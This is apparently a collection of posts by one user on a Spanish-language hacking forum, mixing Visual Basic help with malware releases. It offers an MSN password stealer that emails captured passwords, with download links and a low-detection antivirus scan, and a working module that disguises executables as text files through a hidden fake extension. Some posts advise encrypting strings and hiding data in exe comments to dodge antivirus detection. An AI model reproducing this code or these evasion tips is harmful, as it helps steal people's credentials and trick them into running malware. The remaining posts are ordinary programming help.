Mensajes

[Que hace?]

Que hace?
Obtiene contraceñas y las manda por email

Para que sirve?
Mata, Mata, MATAA!
Si te olvidaste la contraceña y la tenes guardada en el msn con esto la recuperas.

Como hace?
Usa el modulo WLMPD de Cobein.

Foto:




Escaneo:
File Info

Report date: 2010-07-26 16:09:29 (GMT 1)
File name: ElementalStub.dll
File size: 49152 bytes
MD5 Hash: cd7d2e1805a1c57d747da1dee5428aaf
SHA1 Hash: 383b5f71c797c99942cef684a94a2c99fce7103d
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/Spy.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/VBTrojan.17G!Maximus
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -


Ver Reporte

Descarga
Depositfiles:
http://depositfiles.com/files/7lxj5fqz3

Mirror Fileserve:
http://www.fileserve.com/file/KeGv9VW

[Que hace?]

Que hace?
Modifica el Registro añadiendo una nueva extensión de archivo

Para que sirve?
Posta esto sirve?
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.

Como hace?
Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj

Código [Seleccionar] Expandir


HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"


Codigo mInfectExt

Código (vb) [Seleccionar] Expandir


Option Explicit
' /-----------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module      : mInfectExt                                                        |=|
'|=| DateTime    : 24/07/2010 05:14 PM                                               |=|
'|=| Author      : Elemental Code                                                    |=|
'|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
'|=| WebPage     : I haven't got one Yet ^.^                                         |=|
'|=| Purpose     : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
'|=| Requirements: UAC may Stop you, i dont know >.<                                 |=|
'|=| Distribution: You can freely use this code in your own                          |=|
'|=|               applications, but you may not reproduce                           |=|
'|=|               or publish this code on any web site,                             |=|
'|=|               online service, or distribute as source                           |=|
'|=|               on any media without express permission.                          |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
' \-----------------------------------------------------------------------------------/
Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
   Dim WS As Object
   Dim FullExt As String
   Dim UniqVal As String
   UniqVal = Ext & "File"
   FullExt = "." & Ext

   Set WS = CreateObject("WScript.Shell")
   WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
   WS.RegWrite "HKCR\" & UniqVal & "\", Info
    If Ocult = True Then
       WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
    EndIf
   WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
End Function


Como Usar
lo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)

Código (vb) [Seleccionar] Expandir

InfectExt "virus", "Archivo de Texto", True


PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^



Editado, Ahora permite elegir si la extensión queda siempre oculta o no.

Genial el code.
Ojala lo entendiera 

PD: Avira es el unico que detecto mi stealer con el codigo de Cobein.

Me parece que es re paranoico porque lo que detectaba era la funcion para mandar mails a gmail y no el modulo passdump >.<

Ya desvie el tema demasiado.

Buen code

Hoaaa  

Voy a hacer un programa trilladisimo.
Guarda los contactos de msn en un documento y permite agregarlos todos juntos de una vez ^^

Quisiera saber como hago para que el programa tenga "Pestañas".
ejemplo:

(los botoncitos logs, builder, stealer)

Como funciona el cls (modulo de clase) XP button y que ventaja tiene frente a mi querido Command Button

y ultima:
como hago para que un list box tenga varias columnas?.


Gracias ^^

Puede que yo sea un salame sin remedio perooo.

Obtener codigo:

Código (vb) [Seleccionar] Expandir


    dim codigo as string 'el codigo binario
    dim exefile as string 'la ruta de tu exe

    Open Exefile For Binary As #1
    codigo = Space(LOF(1))
    Get #1, , codigo
    Close #1


Para escribir Codigo:

Código (vb) [Seleccionar] Expandir

    dim exefile as string 'la ruta adonde guardas el nuevo exe
    dim codigorecibido as string 'el codigo binario que recibiste con el winsock

    Open exefile For Binary As #1
    Put #1, , CodigoRecibido
    Close #1


Ahora adapta eso para que funcione con tu codigo

se como hacer.
supongamos que tu form tiene

Width = 6285

height = 4320

entonces haces esto
(suponiendo que tu mdi se llama MDIForm1)

Código (vb) [Seleccionar] Expandir

Private Sub MDIForm_Resize()
    Me.Height = 4320
    Me.Width = 6285
End Sub

Esto va a evitar que el formulario cambie de tamaño.
pero el problema es que si lo maximizaran obtendrian un pechocho error de ejecutacion.

Fijate que mas encontras.

Estoy aburrido...

Si te vuelves a aburrir, tú que eres un gran programador y yo no tengo nada de tiempo, a ver si podrías capturar el dobleclick en la barra de título de un formulario  para que no se redimensione.

cambia el Style a fixed Dialog o fixed Toolbar >.<

Faaaa Como el antiguo autoclick que usaba para entrar en los servers del mu que estaban full.

que recuerdos ^.^

Ahora miro el codigo, gracias por los recuerdos.

[Que hace?]

Que hace?
Genera strings aleatorias entre dos rango de caracteres ascii

Para que sirve?
y yo como voy a saber
Para crear contraceñas o claves

Como hace?
uso como seed la division "timer" (ni idea que es eso, me lo dijo un amigo y no se de donde sale ese numero.) por la hora del sistema.
despues uso rnd para "fabricar" un numero y a eso lo multiplica por la diferencia entre el maximo valor ascii y el minimo mas uno. Al resultado se le suma el minimo valor ascii y despues se convierte a caracter con la funcion chr

Codigo mRndString

Código (vb) [Seleccionar] Expandir

'/-------------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module      : mRndString                                                        |=|
'|=| DateTime    : 17/07/2010 07:42 PM                                               |=|
'|=| Author      : Elemental Code                                                    |=|
'|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
'|=| WebPage     : I haven't got one Yet ^.^                                         |=|
'|=| Purpose     : Generates Randoms Strings (like a Password)                       |=|
'|=| Requirements: Two hands (I havent tried with one, it migth work, I don't know)  |=|
'|=| Distribution: You can freely use this code in your own                          |=|
'|=|               applications, but you may not reproduce                           |=|
'|=|               or publish this code on any web site,                             |=|
'|=|               online service, or distribute as source                           |=|
'|=|               on any media without express permission.                          |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
'\-------------------------------------------------------------------------------------/
Option Explicit
Public Function Random_String(StringLength As Long) As String
   Dim FinalString As String
   Dim MaxAscii As Integer
   Dim MinAscii As Integer
   Dim CurLength As Long
   
   'ENG: 48 to 126 All characters | 65 to 126 just letters |48 to 57 Numbers Only | for more info get an ascii table. >.<
   'ESP: 48 al 126 Todos los caracteres | 65 al 126 solo letras | 48 al 57 Solo Numeros | Para mas info buscate una table ascii >.<
   MaxAscii = 126
   MinAscii = 48
   
   'ENG: to make it as random as I can the number changes each milisecond.
   'ESP: para hacerlo lo mas aleatorio posible el numero cambia cada milisegundo.
   Randomize Timer / Val(Time)
   
   
   For CurLength = 1 To StringLength
       FinalString = FinalString & Chr(Int((MaxAscii - MinAscii + 1) * Rnd + MinAscii))
   Next CurLength
   
   Random_String = StrReverse(FinalString)
End Function


Proyecto de ejemplo
Pongan en un form 2 textbox y un comand button
el siguiente codigo va en el codigo del boton
(la caja 1 sera la string generada y la caja 2 sera la longitud)

Código (vb) [Seleccionar] Expandir

Text1.Text = Random_String(Text2.Text)

Espero que sirva ^.^

me gusto la idea de poner los datos en los comentarios del exe.

con eso te sacas de ensima la heuristica de los av cuando detectan que te abris a vos mismo.

Muy bueno, ya veo el codigo.



esteeeee...

me trabe.
quise armar un builder y me di cuenta de que no tengo ni idea de como cambiar la informacion del ejecutable...

voy a googlear, si alguien sabe me avisa?